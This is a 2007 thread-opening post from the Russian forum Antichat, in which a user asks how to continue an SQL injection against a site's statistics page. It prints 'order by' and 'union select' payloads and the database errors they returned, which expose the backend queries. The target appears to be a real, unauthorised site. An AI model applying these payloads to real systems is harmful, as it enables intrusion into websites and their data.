Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вопрос специалистам в sql-injection |
30.12.2007, 23:10
|
|
Новичок
Регистрация: 02.11.2007
Сообщений: 29
Провел на форуме:
114292
Репутация:
9
|
|
Вопрос специалистам в sql-injection
Всем привет. Такой вопрос:
есть sql-injection. При запросе при добавлении к уязвимому параметру:
monthname=december' order by 8/*
выдаётся следующая ошибка:
Код:
Error: Запрос: SELECT SUM(uhits) AS suhits, SUM(vhits) AS svhits, SUM(installs) AS sinstalls, SUM(total) AS stotal, SUM(referals) AS sreferals, SUM(portal) AS sportal, SUM(bonus_inst) AS sbonus_inst FROM stats WHERE id_user='4455' AND YEAR(date)=YEAR(NOW()) AND MONTHNAME(date)='December' order by 8/*' Ошибка: Unknown column '8' in 'order clause'
При вводе:
monthname=december' order by 7/* ошибки не выдается, естественно выводится нормальная страница, получается вроде как 7 полей. Однако при
monthname=december' union select 1,2,3,4,5,6,7/*
выводится ошибка вида:
Код:
Error: Запрос: SELECT * FROM stats a WHERE id_user='4455' AND YEAR(date)=YEAR(NOW()) AND MONTHNAME(date)='December' union select 1,2,3,4,5,6,7/*' ORDER by -date Ошибка: The used SELECT statements have a different number of columns
Эта же ошибка выводится во всех запросах по типу
monthname=december' union select в кол-ве колонок от 1 до 60, дальше я не пробовал.
Я так понял тут следуют несколько один за одним запросов, как с этим работать?
Надеюсь на Ваши ответы )
Апд:модеры, я запостил здесь потому что ситуация не еденичная и вообще не очень широко освещена в статьях. Тема о том, что и как делать если идут подряд несколько запросов.
Последний раз редактировалось JenJen; 30.12.2007 в 23:39..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид